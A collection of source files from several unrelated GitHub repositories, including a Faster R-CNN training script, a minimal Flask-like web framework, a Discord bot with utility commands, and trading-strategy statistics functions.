class VoteEventDetail(APIView):
def get_object(self, pk):
try:
return VoteEvent.objects.get(pk = pk)
except VoteEvent.DoesNotExist:
return self.error(status = 404)
def get(self, request, pk):
voteEvent = self.get_object(pk)
serializer = VoteEventSerializer(voteEvent)
return self.success(data = serializer.data)
@login_required
def put(self, request, pk):
voteEvent = self.get_object(pk)
serializer = VoteEventSerializer(voteEvent, data = request.data)
if serializer.is_valid():
serializer.save()
return self.success(data = serializer.data)
return self.error(msg = serializer.errors, status = 400)
@login_required
def delete(self, request, pk):
voteEvent = self.get_object(pk)
voteEvent.delete()
return self.success(status = 204)
``` |
{
"source": "JimmyHHua/Poster_faster-rcnn",
"score": 2
} |
#### File: JimmyHHua/Poster_faster-rcnn/train.py
```python
import os
import ipdb
import matplotlib
import torch as t
from tqdm import tqdm
import numpy as np
from scipy.misc import imsave
from utils.config import opt
from data.dataset import Dataset, TestDataset, inverse_normalize
from model import FasterRCNNVGG16
from torch.autograd import Variable
from torch.utils import data as data_
from trainer import FasterRCNNTrainer
from utils import array_tool as at
from utils.vis_tool import visdom_bbox
from data.util import read_image
from utils.eval_tool import eval_detection_voc
# fix for ulimit
# https://github.com/pytorch/pytorch/issues/973#issuecomment-346405667
import resource
rlimit = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (20480, rlimit[1]))
matplotlib.use('agg')
def eval(dataloader, faster_rcnn, test_num=133):
pred_bboxes, pred_labels, pred_scores = list(), list(), list()
gt_bboxes, gt_labels, gt_difficults = list(), list(), list()
for ii, (imname, imgs, gt_bboxes_, gt_labels_, gt_difficults_) in tqdm(enumerate(dataloader)):
#print(imname,imgs.shape)
#print(imgs.shape,gt_bboxes_,gt_labels_)
pred_bboxes_, pred_labels_, pred_scores_ = faster_rcnn.predict(imgs, visualize=True)
# for ii, (imname,imgs, sizes, gt_bboxes_, gt_labels_, gt_difficults_) in tqdm(enumerate(dataloader)):
# sizes = [sizes[0][0], sizes[1][0]]
# pred_bboxes_, pred_labels_, pred_scores_ = faster_rcnn.predict(imgs, [sizes])
gt_bboxes += list(gt_bboxes_.numpy())
gt_labels += list(gt_labels_.numpy())
gt_difficults += list(gt_difficults_.numpy())
pred_bboxes += pred_bboxes_
pred_labels += pred_labels_
pred_scores += pred_scores_
if ii == test_num: break
result = eval_detection_voc(
pred_bboxes, pred_labels, pred_scores,
gt_bboxes, gt_labels, gt_difficults,
use_07_metric=True)
return result
def train(**kwargs):
opt._parse(kwargs)
dataset = Dataset(opt)
print('load data')
dataloader = data_.DataLoader(dataset, \
batch_size=1, \
shuffle=True, \
# pin_memory=True,
num_workers=opt.num_workers)
testset = TestDataset(opt)
test_dataloader = data_.DataLoader(testset,
batch_size=1,
num_workers=opt.test_num_workers,
shuffle=False, \
pin_memory=True
)
faster_rcnn = FasterRCNNVGG16()
print('model construct completed')
trainer = FasterRCNNTrainer(faster_rcnn).cuda()
if opt.load_path:
trainer.load(opt.load_path)
print('load pretrained model from %s' % opt.load_path)
print('the labels is :',dataset.db.label_names)
#trainer.vis.text(dataset.db.label_names, win='labels')
best_map = 0
lr_ = opt.lr
for epoch in range(14):
trainer.reset_meters()
print('hello')
for ii, (img, bbox_, label_, scale) in tqdm(enumerate(dataloader)):
scale = at.scalar(scale)
img, bbox, label = img.cuda().float(), bbox_.cuda(), label_.cuda()
img, bbox, label = Variable(img), Variable(bbox), Variable(label)
trainer.train_step(img, bbox, label, scale)
#print('hahah')
# if ii==5:
# break
# if (ii + 1) % opt.plot_every == 0:
# if os.path.exists(opt.debug_file):
# ipdb.set_trace()
# # plot loss
# #trainer.vis.plot_many(trainer.get_meter_data())
# #print(trainer.get_meter_data())
# # plot groud truth bboxes
# ori_img_ = inverse_normalize(at.tonumpy(img[0]))
# gt_img = visdom_bbox(ori_img_,
# at.tonumpy(bbox_[0]),
# at.tonumpy(label_[0]))
# trainer.vis.img('gt_img', gt_img)
# # plot predicti bboxes
# _bboxes, _labels, _scores = trainer.faster_rcnn.predict([ori_img_], visualize=True)
# pred_img = visdom_bbox(ori_img_,
# at.tonumpy(_bboxes[0]),
# at.tonumpy(_labels[0]).reshape(-1),
# at.tonumpy(_scores[0]))
# trainer.vis.img('pred_img', pred_img)
# # rpn confusion matrix(meter)
# #trainer.vis.text(str(trainer.rpn_cm.value().tolist()), win='rpn_cm')
# # roi confusion matrix
# trainer.vis.img('roi_cm', at.totensor(trainer.roi_cm.conf, False).float())
eval_result = eval(test_dataloader, faster_rcnn, test_num=opt.test_num)
print('^^^^^^^^^^^^^^^^^^^^^^^^^^^')
if eval_result['map'] > best_map:
best_map = eval_result['map']
best_path = trainer.save(best_map=best_map)
print('map:',eval_result['map'],'best_map:',best_map)
if epoch == 9:
trainer.load(best_path)
trainer.faster_rcnn.scale_lr(opt.lr_decay)
lr_ = lr_ * opt.lr_decay
print('*************************')
#trainer.vis.plot('test_map', eval_result['map'])
# log_info = 'lr:{}, map:{},loss:{}'.format(str(lr_),
# str(eval_result['map']),
# str(trainer.get_meter_data()))
# #trainer.vis.log(log_info)
print('***************: this is epoch: ', epoch)
# if epoch == 1:
# break
def test_me(**kwargs):
opt._parse(kwargs)
img=read_image('/home/huachunrui/model_h5/img/tim.jpg')
print('1: ',img.shape)
img=t.from_numpy(img)[None]
print('2: ',img.shape)
faster_rcnn=FasterRCNNVGG16()
print('model construct completed')
trainer=FasterRCNNTrainer(faster_rcnn).cuda()
print("load all weights")
trainer.load(opt.load_path)
pred_bboxes_, pred_labels_, pred_scores_ = faster_rcnn.predict(img, visualize=True)
print('img numpy is: ',at.tonumpy(img[0]))
pred_img = visdom_bbox(at.tonumpy(img[0]),
at.tonumpy(pred_bboxes_[0]),
at.tonumpy(pred_labels_[0]).reshape(-1),
at.tonumpy(pred_scores_[0]).reshape(-1))
imsave('/home/huachunrui/model_h5/img/000b.jpg',(255*pred_img).transpose(1,2,0))
print('pass')
def test_jimmy(**kwargs):
opt._parse(kwargs)
print('load data')
testset=TestDataset(opt)
test_dataloader=data_.DataLoader(testset,batch_size=1,num_workers=opt.test_num_workers,shuffle=False,pin_memory=True)
faster_rcnn=FasterRCNNVGG16()
print('model construct completed')
trainer=FasterRCNNTrainer(faster_rcnn).cuda()
print("load all weights")
trainer.load(opt.load_path)
pred_bboxes, pred_labels, pred_scores = list(), list(), list()
imnames, gt_bboxes, gt_labels, gt_difficults = list(), list(), list(),list()
for ii, (imname, imgs, gt_bboxes_, gt_labels_, gt_difficults_) in tqdm(enumerate(test_dataloader)):
#print(imname,imgs.shape)
#print(imgs.shape,gt_bboxes_,gt_labels_)
pred_bboxes_, pred_labels_, pred_scores_ = faster_rcnn.predict(imgs, visualize=True)
ori_img = visdom_bbox(at.tonumpy(imgs[0]),
at.tonumpy(gt_bboxes_[0]),
at.tonumpy(gt_labels_[0]).reshape(-1))
ori_file=os.path.join('/home/huachunrui/model_h5/img/img-0.78/'+'{}_origin.jpg'.format(ii))
imsave(ori_file,(255*at.tonumpy(ori_img)).transpose(1,2,0))
pred_img = visdom_bbox(at.tonumpy(imgs[0]),
at.tonumpy(pred_bboxes_[0]),
at.tonumpy(pred_labels_[0]).reshape(-1),
at.tonumpy(pred_scores_[0]).reshape(-1))
#print(pred_img.shape,pred_img)
pre_file=os.path.join('/home/huachunrui/model_h5/img/img-0.77/'+'{}_detected.jpg'.format(ii))
imsave(pre_file,(255*pred_img).transpose(1,2,0))
if ii==2:
break
gt_bboxes += list(gt_bboxes_.numpy())
gt_labels += list(gt_labels_.numpy())
gt_difficults += list(gt_difficults_.numpy())
imnames += imname
pred_bboxes += pred_bboxes_
pred_labels += pred_labels_
pred_scores += pred_scores_
if ii == opt.test_num:#132
np.save('/home/huachunrui/model_h5/img/img-0.78/imnames.npy',imnames)
np.save('/home/huachunrui/model_h5/img/img-0.78/gt_bboxes.npy',gt_bboxes)
np.save('/home/huachunrui/model_h5/img/img-0.78/gt_labels.npy',gt_labels)
np.save('/home/huachunrui/model_h5/img/img-0.78/pred_bboxes.npy',pred_bboxes)
np.save('/home/huachunrui/model_h5/img/img-0.78/pred_labels.npy',pred_labels)
np.save('/home/huachunrui/model_h5/img/img-0.78/pred_scores.npy',pred_scores)
break
result = eval_detection_voc(
pred_bboxes, pred_labels, pred_scores,
gt_bboxes, gt_labels, gt_difficults,
use_07_metric=True)
print("mAP: ",result['map'])
print('Everything is ok !')
def test(**kwargs):
opt._parse(kwargs)
dataset=Dataset(opt)
print('load data')
testset=TestDataset(opt)
test_dataloader=data_.DataLoader(testset,batch_size=1,num_workers=opt.test_num_workers,shuffle=False,pin_memory=True)
faster_rcnn=FasterRCNNVGG16()
print('model construct completed')
trainer=FasterRCNNTrainer(faster_rcnn).cuda()
print("load all weights")
#opt.load_path='/home/xulu/model_h5/checkpoints/fasterrcnn_04251612_0.784629387622'
trainer.load(opt.load_path)
#if opt.load_path:
# trainer.load(opt.load_path)
# print('load pretrained model from %s'% opt.load_path)
pred_bboxes, pred_labels, pred_scores = list(), list(), list()
imnames, gt_bboxes, gt_labels, gt_difficults = list(), list(), list(),list()
for ii, (imname, imgs, sizes, gt_bboxes_, gt_labels_, gt_difficults_) in tqdm(enumerate(test_dataloader)):
print(imname,imgs[0].shape)
# print(imgs.shape,gt_bboxes_,gt_labels_)
sizes = [sizes[0][0], sizes[1][0]]
# print(sizes)
pred_bboxes_, pred_labels_, pred_scores_ = faster_rcnn.predict(imgs, [sizes])
# print(pred_bboxes_, pred_labels_, pred_scores_)
# plot groud truth bboxes
ori_img_ = inverse_normalize(at.tonumpy(imgs[0]))
imsave('/home/huachunrui/result_test_h5/a.jpg',(255*ori_img_).transpose(1,2,0))
gt_img = visdom_bbox(ori_img_,
at.tonumpy(gt_bboxes_[0]),
at.tonumpy(gt_labels_[0]))
# print(gt_img.shape)
imsave('/home/huachunrui/result_test_h5/b.jpg',(255*gt_img).transpose(1,2,0))
# plot predicti bboxes
pred_img = visdom_bbox(gt_img,
at.tonumpy(pred_bboxes_[0]),
at.tonumpy(pred_labels_[0]).reshape(-1),
at.tonumpy(pred_scores_[0]))
# print(pred_img.shape,pred_img)
imsave('/home/huachunrui/result_test_h5/c.jpg',(255*pred_img).transpose(1,2,0))
gt_bboxes += list(gt_bboxes_.numpy())
gt_labels += list(gt_labels_.numpy())
gt_difficults += list(gt_difficults_.numpy())
imnames += imname
pred_bboxes += pred_bboxes_
pred_labels += pred_labels_
pred_scores += pred_scores_
if ii == opt.test_num:#132
np.save('/home/huachunrui/result_test_h5/imnames.npy',imnames)
np.save('/home/huachunrui/result_test_h5/gt_bboxes.npy',gt_bboxes)
np.save('/home/huachunrui/result_test_h5/gt_labels.npy',gt_labels)
np.save('/home/huachunrui/result_test_h5/pred_bboxes.npy',pred_bboxes)
np.save('/home/huachunrui/result_test_h5/pred_labels.npy',pred_labels)
np.save('/home/huachunrui/result_test_h5/pred_scores.npy',pred_scores)
break
result = eval_detection_voc(
pred_bboxes, pred_labels, pred_scores,
gt_bboxes, gt_labels, gt_difficults,
use_07_metric=True)
print("mAP: ",result['map'])
if __name__ == '__main__':
import fire
fire.Fire()
``` |
{
"source": "jimmyhmiller/one-hundred-lines-or-less",
"score": 3
} |
#### File: python/flask/__init__.py
```python
from itertools import imap, ifilter
from functools import wraps
import json
import sys, os
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from http import create_server
from inspect import getargspec
not_found = {
"status": 404,
"headers": {"Content-type": "application/json"},
"body": json.dumps({"error": "route not found"})
}
def plain_text(body):
return {
"status": 200,
"headers": {"Content-type": "text/plain"},
"body": body
}
def wrap_response(response):
if isinstance(response, str):
return plain_text(response)
else:
return response
def call_handler(handler, data):
arity = len(getargspec(handler).args)
if arity == 1:
return wrap_response(handler(data))
else:
return wrap_response(handler())
class Flask(object):
"""docstring for Vial"""
def __init__(self, name):
self.name = name
self.routes = {}
def handler(self, request):
route_handler = self.routes.get(request["path"], None)
if route_handler:
return call_handler(route_handler, request)
else:
return not_found
def route(self, path):
def decorator(f):
self.routes[path] = f
return f
return decorator
def run(self):
create_server(self.handler)
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
if __name__ == '__main__':
app.run()
``` |
{
"source": "jimmyhua123/discord-bot-for-public",
"score": 2
} |
#### File: jimmyhua123/discord-bot-for-public/botTerry.py
```python
import discord
from discord.ext import commands
import json
import random
import os
intents = discord.Intents.all()#dicord1.5 更新
from googleapiclient.discovery import build
with open('setting.json','r',encoding='utf8')as jFile: #r=read讀取as命名jfile
jdata=json.load(jFile)#呼叫jdata=呼叫json
api_key="hi"
bot = commands.Bot(command_prefix='//',intents=intents)#呼叫前要打的
@bot.event #自動觸發事件
async def on_ready(): #函式 重新定義
print(">>Bot is online<<")
#channel = bot.get_channel(int(jdata["test_channel"]))
#await channel.send('>>Bot is online<<')
@bot.command()
async def load(ctx,extension):
bot.load_extension(f'cmds.{extension}')
await ctx.send(f'Loaded{extension} done')
@bot.command()
async def unload(ctx,extension):
bot.unload_extension(f'cmds.{extension}')
await ctx.send(f'Unloaded{extension} done')
#reload暫時壞了不知道為啥 可能跟我打help會出現2個一樣
@bot.command()
async def reload(ctx,extension):
bot.reload_extension(f'cmds.{extension}')
await ctx.send(f'Reloaded{extension} done')
@bot.command(aliases=["show"])
async def showpic(ctx,*,search):
ran = random.randint(0, 9)
resource = build("customsearch", "v1", developerKey=api_key).cse()
result = resource.list(
q=f"{search}", cx="020feebf5412510ee", searchType="image").execute()
url = result["items"][ran]["link"]
embed1 = discord.Embed(title=f"Here Your Image ({search}) work?")
embed1.set_image(url=url)
await ctx.send(embed=embed1)
for Filename in os.listdir('./cmds'): #./=相對路徑
if Filename.endswith('.py'):
print(Filename)
bot.load_extension(f'cmds.{Filename[:-3]}') #-3 = 把.py三個字變不見
if __name__ == "__main__":
bot.run(jdata['TOKEN'])#需要string形式=''
```
#### File: discord-bot-for-public/cmds/main.py
```python
from _typeshed import Self
import discord
from discord import file
from discord.ext import commands
from discord.ext.commands.core import command
from core.classes import Cog_Extension
import json,random
import datetime
with open('setting.json','r',encoding='utf8')as jFile: #r=read讀取as命名jfile
jdata=json.load(jFile)#呼叫jdata=呼叫json
class Main(Cog_Extension):
@commands.command()
async def online_list(self,ctx):#ctx.guild 所在私服器
for member in ctx.guild.members:
if str(member.status) == 'online'and member.bot==False:#注意type
await ctx.send(f'{member} 的狀態是 {member.status}')
@commands.command()
async def offline_list(self,ctx):#ctx.guild 所在私服器
for member in ctx.guild.members:
if str(member.status) == 'offline'and member.bot==False:#注意type
await ctx.send(f'{member} 的狀態是 {member.status}')
@commands.command()
async def jojo(self,ctx):#embed
embed=discord.Embed(title="SHIZAAAAAAAA",url="https://www.youtube.com/watch?v=0-Kda5ZLN5s,color=0x4c712d")
embed.set_author(name="Majaja")
embed.add_field(name="test", value='1', inline=True)
embed.add_field(name='2', value='3', inline=True)
embed.add_field(name='4', value='5', inline=True)
embed.set_footer(text='test123456')
await ctx.send(embed=embed)
@commands.command()#回話
async def sayd(self,ctx,*,msg):
await ctx.message.delete()
await ctx.send(msg)
@commands.command()#回話
async def say10times(self,ctx,*,msg):
await ctx.message.delete()
for i in range(1,11):
await ctx.send(msg)
@commands.command()#清理
async def cleanmsg(self,ctx,num:int):
await ctx.channel.purge(limit=num+1)
await ctx.send(f'already cleaned ,{num} message')
@commands.command()
async def online_list(self,ctx):#ctx.guild 所在私服器
for member in ctx.guild.members:
if str(member.status) == 'online'and member.bot==False:#注意type
await ctx.send(f'{member} 的狀態是 {member.status}')
@commands.command()
async def offline_list(self,ctx):#ctx.guild 所在私服器
for member in ctx.guild.members:
if str(member.status) == 'offline'and member.bot==False:#注意type
await ctx.send(f'{member} 的狀態是 {member.status}')
@commands.command()
async def rand_online_squad(self,ctx):#ctx.guild 所在私服器
# print(ctx.guild.members)
online =[]
for member in ctx.guild.members:
#print(member.status)
#await ctx.send(f'{member} 的狀態是 {member.status}')
if str(member.status) == 'online'and member.bot==False:#注意type
online.append(member.name)#加入
#print(online)
random_online=[]
random_online = random.sample(online,k=10)
for squad in range(2):
rlist = random.sample(random_online,k=5)#隨機挑n人放到list直到結束
await ctx.send(f'第 {squad+1} 隊是 {rlist}')
for name in rlist:
random_online.remove(name)
@commands.command()
async def rand_offline_squad(self,ctx):#ctx.guild 所在私服器
offline =[]
for member in ctx.guild.members:
if str(member.status) == 'offline'and member.bot==False:#注意type
offline.append(member.name)#加入
random_offline=[]
random_offline = random.sample(offline,k=15)
for squad in range(3):
rlist = random.sample(random_offline,k=5)
await ctx.send(f'第 {squad+1} 隊是 {rlist}')
for name in rlist:
random_offline.remove(name)
#for x in random.sample(offline,k=4):#sample == 不重複
@commands.command()
async def rand_offline_squad(self,ctx):#ctx.guild 所在私服器
offline =[]
for member in ctx.guild.members:
if str(member.status) == 'offline'and member.bot==False:#注意type
offline.append(member.name)#加入
random_offline=[]
random_offline = random.sample(offline,k=15)
for squad in range(3):
rlist = random.sample(random_offline,k=5)
await ctx.send(f'第 {squad+1} 隊是 {rlist}')
for name in rlist:
random_offline.remove(name)
#for x in random.sample(offline,k=4):#sample == 不重複
@commands.command()
async def load(self,ctx):
await ctx.send('Shutting down...')
db.commit()
self.bot.scheduler.shutdown()
await self.bot.logout()
def setup(bot):
bot.add_cog(Main(bot))#呼叫 傳回init
```
#### File: discord-bot-for-public/cmds/permissions.py
```python
import discord
from discord import file
from discord.ext import commands
from discord.ext.commands.core import command
from core.classes import Cog_Extension
import json,random
import datetime
with open('setting.json','r',encoding='utf8')as jFile: #r=read讀取as命名jfile
jdata=json.load(jFile)#呼叫jdata=呼叫json
class permissions(Cog_Extension):
def __init__(self,*args,**kwargs):#**==可變參數 def __init__()==格式化 https://www.youtube.com/watch?v=dBeC-SM-DNw&list=PLSCgthA1Anif1w6mKM3O6xlBGGypXtrtN&index=14&t=14s&ab_channel=Proladon
super().__init__(*args,**kwargs)#super.__init__ => 再重新繼承
try:
with open("./banlist.txt","r",encoding="utf-8")as f:
self.banlist=[int(line.strip())for line in f.readlines()]
except FileNotFoundError:
self.banlist=[]
@commands.command()#回話
async def hii(self,ctx):
await ctx.send('hello')
def setup(bot):
bot.add_cog(permissions(bot))#呼叫 傳回init
```
#### File: discord-bot-for-public/cmds/task.py
```python
import discord
from discord import file
from discord.ext import commands
from discord.ext.commands.core import command
from core.classes import Cog_Extension
import json,asyncio,datetime
with open('setting.json','r',encoding='utf8')as jFile: #r=read讀取as命名jfile
jdata=json.load(jFile)#呼叫jdata=呼叫json
#指定/間隔 時間執行指令 - 異步執行/協程概念
class Task(Cog_Extension):
def __init__(self,*args,**kwargs):#**==可變參數 def __init__()==格式化 https://www.youtube.com/watch?v=dBeC-SM-DNw&list=PLSCgthA1Anif1w6mKM3O6xlBGGypXtrtN&index=14&t=14s&ab_channel=Proladon
super().__init__(*args,**kwargs)#super.__init__ => 再重新繼承#不用加裝飾器
self.counter=0
async def interval():
await self.bot.wait_until_ready() #等bot開好
self.channel = self.bot.get_channel(int(jdata["test_channel"]))
while not self.bot.is_closed():#whilenotclose
pass
#await self.channel.send('hi bot is running')
#await asyncio.sleep(2)#單位:秒
#self.bg_task=self.bot.loop.create_task(interval())
async def time_task():
await self.bot.wait_until_ready() #等bot開好
self.channel = self.bot.get_channel(888174408026456114)
while not self.bot.is_closed():#while bot not close
now_time=datetime.datetime.now().strftime("%H%M")#只有 小時 分鐘
with open('setting.json','r',encoding='utf8')as jFile:
jdata=json.load(jFile)
if now_time == jdata['time'] and self.counter==0:
self.counter = 1
await self.channel.send("task working")
await asyncio.sleep(2)
#elif now_time != jdata['time'] and self.counter==0:
# self.counter = 1
# await self.channel.send("task not working")
# await asyncio.sleep(2)
else:
await asyncio.sleep(2)
pass
self.bg_task=self.bot.loop.create_task(time_task())
@commands.command()
async def set_channel(self,ctx,ch:int): #ch:int 宣告int
self.channel=self.bot.get_channel(ch)
await ctx.send(f'Set channel:{self.channel.mention}')
@commands.command()
async def set_time(self,ctx, time): #
self.counter = 0
with open('setting.json','r',encoding='utf8')as jFile:
jdata=json.load(jFile)
jdata['time']=time
with open('setting.json','w',encoding='utf8')as jFile:#w=>寫入
json.dump(jdata,jFile,indent=4)#縮排4
await ctx.send(f'Set time:{int(jdata["time"])}')
def setup(bot):
bot.add_cog(Task(bot))
``` |
{
"source": "jimmy-huang/zephyr.js",
"score": 3
} |
#### File: tests/tools/test-tcp4-client.py
```python
import time
import socket
def main():
print "Socket client creat successful"
host = "192.0.2.1"
port = 9876
bufSize = 1024
addr = (host, port)
Timeout = 300
mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mySocket.settimeout(Timeout)
mySocket.connect(addr)
while 1:
try :
Data = mySocket.recv(bufSize)
Data = Data.strip()
print "Got data: ", Data
time.sleep(2)
if Data == "close":
mySocket.close()
print "close socket"
break
else:
mySocket.sendall(Data)
print "Send data: ", Data
except KeyboardInterrupt :
print "exit client"
break
except :
print "time out"
continue
if __name__ == "__main__" :
main()
``` |
{
"source": "jimmyhzuk/pinkfish",
"score": 3
} |
#### File: pinkfish/pinkfish/statistics.py
```python
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
# Other imports
import pandas as pd
import numpy as np
import operator
import math
from datetime import datetime
from dateutil.relativedelta import relativedelta
from numpy.lib.stride_tricks import as_strided
#####################################################################
# CONSTANTS
TRADING_DAYS_PER_YEAR = 252
TRADING_DAYS_PER_MONTH = 20
TRADING_DAYS_PER_WEEK = 5
#####################################################################
# HELPER FUNCTIONS
def _difference_in_years(start, end):
""" calculate the number of years between two dates """
diff = end - start
diff_in_years = (diff.days + diff.seconds/86400)/365.2425
return diff_in_years
def _get_trade_bars(ts, tlog, op):
l = []
for row in tlog.itertuples():
if op(row.pl_cash, 0):
l.append(len(ts[row.entry_date:row.exit_date].index))
return l
def currency(amount):
if amount >= 0:
return '${:,.2f}'.format(amount)
else:
return '-${:,.2f}'.format(-amount)
#####################################################################
# OVERALL RESULTS
def beginning_balance(capital):
return capital
def ending_balance(dbal):
return dbal.iloc[-1]['close']
def total_net_profit(tlog):
return tlog.iloc[-1]['cumul_total']
def gross_profit(tlog):
return tlog[tlog['pl_cash'] > 0].sum()['pl_cash']
def gross_loss(tlog):
return tlog[tlog['pl_cash'] < 0].sum()['pl_cash']
def profit_factor(tlog):
if gross_profit(tlog) == 0: return 0
if gross_loss(tlog) == 0: return 1000
return gross_profit(tlog) / gross_loss(tlog) * -1
def return_on_initial_capital(tlog, capital):
return total_net_profit(tlog) / capital * 100
def _cagr(B, A, n):
""" calculate compound annual growth rate """
return (math.pow(B / A, 1 / n) - 1) * 100
def annual_return_rate(end_balance, capital, start, end):
B = end_balance
A = capital
n = _difference_in_years(start, end)
return _cagr(B, A, n)
def trading_period(start, end):
diff = relativedelta(end, start)
return '{} years {} months {} days'.format(diff.years, diff.months, diff.days)
def _total_days_in_market(dbal):
n = (dbal['shares'] > 0).sum()
if dbal.iloc[-2]['shares'] > 0:
n += 1
return n
def pct_time_in_market(dbal):
return _total_days_in_market(dbal) / len(dbal) * 100
#####################################################################
# SUMS
def total_num_trades(tlog):
return len(tlog.index)
def trades_per_year(tlog, start, end):
diff = relativedelta(end, start)
years = diff.years + diff.months/12 + diff.days/365
return total_num_trades(tlog) / years
def num_winning_trades(tlog):
return (tlog['pl_cash'] > 0).sum()
def num_losing_trades(tlog):
return (tlog['pl_cash'] < 0).sum()
def num_even_trades(tlog):
return (tlog['pl_cash'] == 0).sum()
def pct_profitable_trades(tlog):
if total_num_trades(tlog) == 0: return 0
return num_winning_trades(tlog) / total_num_trades(tlog) * 100
#####################################################################
# CASH PROFITS AND LOSSES
def avg_profit_per_trade(tlog):
if total_num_trades(tlog) == 0: return 0
return total_net_profit(tlog) / total_num_trades(tlog)
def avg_profit_per_winning_trade(tlog):
if num_winning_trades(tlog) == 0: return 0
return gross_profit(tlog) / num_winning_trades(tlog)
def avg_loss_per_losing_trade(tlog):
if num_losing_trades(tlog) == 0: return 0
return gross_loss(tlog) / num_losing_trades(tlog)
def ratio_avg_profit_win_loss(tlog):
if avg_profit_per_winning_trade(tlog) == 0: return 0
if avg_loss_per_losing_trade(tlog) == 0: return 1000
return (avg_profit_per_winning_trade(tlog) /
avg_loss_per_losing_trade(tlog) * -1)
def largest_profit_winning_trade(tlog):
if num_winning_trades(tlog) == 0: return 0
return tlog[tlog['pl_cash'] > 0].max()['pl_cash']
def largest_loss_losing_trade(tlog):
if num_losing_trades(tlog) == 0: return 0
return tlog[tlog['pl_cash'] < 0].min()['pl_cash']
#####################################################################
# POINTS
def num_winning_points(tlog):
if num_winning_trades(tlog) == 0: return 0
return tlog[tlog['pl_points'] > 0].sum()['pl_points']
def num_losing_points(tlog):
if num_losing_trades(tlog) == 0: return 0
return tlog[tlog['pl_points'] < 0].sum()['pl_points']
def total_net_points(tlog):
return num_winning_points(tlog) + num_losing_points(tlog)
def avg_points(tlog):
if total_num_trades(tlog) == 0: return 0
return tlog['pl_points'].sum() / len(tlog.index)
def largest_points_winning_trade(tlog):
if num_winning_trades(tlog) == 0: return 0
return tlog[tlog['pl_points'] > 0].max()['pl_points']
def largest_points_losing_trade(tlog):
if num_losing_trades(tlog) == 0: return 0
return tlog[tlog['pl_points'] < 0].min()['pl_points']
def avg_pct_gain_per_trade(tlog):
if total_num_trades(tlog) == 0: return 0
df = tlog['pl_points'] / tlog['entry_price']
return np.average(df) * 100
def largest_pct_winning_trade(tlog):
if num_winning_trades(tlog) == 0: return 0
df = tlog[tlog['pl_points'] > 0]
df = df['pl_points'] / df['entry_price']
return df.max() * 100
def largest_pct_losing_trade(tlog):
if num_losing_trades(tlog) == 0: return 0
df = tlog[tlog['pl_points'] < 0]
df = df['pl_points'] / df['entry_price']
return df.min() * 100
#####################################################################
# STREAKS
def _subsequence(s, c):
"""
Takes as parameter list like object s and returns the length of the longest
subsequence of s constituted only by consecutive character 'c's.
Example: If the string passed as parameter is "001000111100", and c is '0',
then the longest subsequence of only '0's has length 3.
"""
count = 0 # current length of the sequence of zeros
maxlen = 0 # temporary value of the maximum length
for bit in s:
if bit == c: # we have read a new '0'
count += 1 # update the length of the current sequence
if count > maxlen: # if necessary, update the temporary maximum
maxlen = count
else: # we have read a 1
count = 0 # reset the length of the current sequence
return maxlen
def max_consecutive_winning_trades(tlog):
if num_winning_trades(tlog) == 0: return 0
return _subsequence(tlog['pl_cash'] > 0, True)
def max_consecutive_losing_trades(tlog):
if num_losing_trades(tlog) == 0: return 0
return _subsequence(tlog['pl_cash'] > 0, False)
def avg_bars_winning_trades(ts, tlog):
if num_winning_trades(tlog) == 0: return 0
return np.average(_get_trade_bars(ts, tlog, operator.gt))
def avg_bars_losing_trades(ts, tlog):
if num_losing_trades(tlog) == 0: return 0
return np.average(_get_trade_bars(ts, tlog, operator.lt))
#####################################################################
# DRAWDOWN AND RUNUP
def max_closed_out_drawdown(close):
""" only compare each point to the previous running peak O(N) """
running_max = pd.Series(close).expanding(min_periods=1).max()
cur_dd = (close - running_max) / running_max * 100
dd_max = min(0, cur_dd.min())
idx = cur_dd.idxmin()
dd = pd.Series()
dd['max'] = dd_max
dd['peak'] = running_max[idx]
dd['trough'] = close[idx]
dd['start_date'] = close[close == dd['peak']].index[0].strftime('%Y-%m-%d')
dd['end_date'] = idx.strftime('%Y-%m-%d')
close = close[close.index > idx]
rd_mask = close > dd['peak']
if rd_mask.any():
dd['recovery_date'] = close[rd_mask].index[0].strftime('%Y-%m-%d')
else:
dd['recovery_date'] = 'Not Recovered Yet'
return dd
def max_intra_day_drawdown(high, low):
""" only compare each point to the previous running peak O(N) """
running_max = pd.Series(high).expanding(min_periods=1).max()
cur_dd = (low - running_max) / running_max * 100
dd_max = min(0, cur_dd.min())
idx = cur_dd.idxmin()
dd = pd.Series()
dd['max'] = dd_max
dd['peak'] = running_max[idx]
dd['trough'] = low[idx]
dd['start_date'] = high[high == dd['peak']].index[0].strftime('%Y-%m-%d')
dd['end_date'] = idx.strftime('%Y-%m-%d')
high = high[high.index > idx]
rd_mask = high > dd['peak']
if rd_mask.any():
dd['recovery_date'] = high[rd_mask].index[0].strftime('%Y-%m-%d')
return dd
def _windowed_view(x, window_size):
"""Create a 2d windowed view of a 1d array.
`x` must be a 1d numpy array.
`numpy.lib.stride_tricks.as_strided` is used to create the view.
The data is not copied.
Example:
>>> x = np.array([1, 2, 3, 4, 5, 6])
>>> _windowed_view(x, 3)
array([[1, 2, 3],
[2, 3, 4],
[3, 4, 5],
[4, 5, 6]])
"""
y = as_strided(x, shape=(x.size - window_size + 1, window_size),
strides=(x.strides[0], x.strides[0]))
return y
def rolling_max_dd(ser, period, min_periods=1):
"""Compute the rolling maximum drawdown of `ser`.
`ser` must be a Series.
`min_periods` should satisfy `1 <= min_periods <= window_size`.
Returns an 1d array with length `len(x) - min_periods + 1`.
"""
window_size = period + 1
x = ser.values
if min_periods < window_size:
pad = np.empty(window_size - min_periods)
pad.fill(x[0])
x = np.concatenate((pad, x))
y = _windowed_view(x, window_size)
running_max_y = np.maximum.accumulate(y, axis=1)
dd = (y - running_max_y) / running_max_y * 100
rmdd = dd.min(axis=1)
return pd.Series(data=rmdd, index=ser.index, name=ser.name)
def rolling_max_ru(ser, period, min_periods=1):
"""Compute the rolling maximum runup of `ser`.
`ser` must be a Series.
`min_periods` should satisfy `1 <= min_periods <= window_size`.
Returns an 1d array with length `len(x) - min_periods + 1`.
"""
window_size = period + 1
x = ser.values
if min_periods < window_size:
pad = np.empty(window_size - min_periods)
pad.fill(x[0])
x = np.concatenate((pad, x))
y = _windowed_view(x, window_size)
running_min_y = np.minimum.accumulate(y, axis=1)
ru = (y - running_min_y) / running_min_y * 100
